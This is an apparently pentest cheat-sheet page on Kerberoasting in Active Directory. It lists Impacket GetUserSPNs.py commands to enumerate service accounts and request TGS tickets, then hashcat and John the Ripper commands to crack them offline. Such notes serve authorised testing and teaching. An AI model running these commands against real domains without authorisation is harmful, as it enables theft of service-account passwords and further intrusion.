Kerberoasting

Step 1: Get the SPN (Service Principal Name)

Use Impacket's GetUserSPNs.py script to retrieve the SPN for a domain account:

python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>

Step 2: Request a TGS (Ticket Granting Service)

To request a TGS for a specific service account, use the same script with the -request-user flag:

python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request-user <SERVICE_ACCOUNT>

Step 3: Crack the TGS

Once you have the TGS, you can use hash cracking tools to crack it.

  • Using Hashcat:

hashcat -a 0 -m 13100 spn.hash /usr/share/wordlists/rockyou.txt

  • Using John the Ripper:

john --format=krb5tgs --wordlist=$wordlist kerberoastables.txt
PreviousLocal Administrator Password Solution (LAPS)NextAS-REP Roasting

Last updated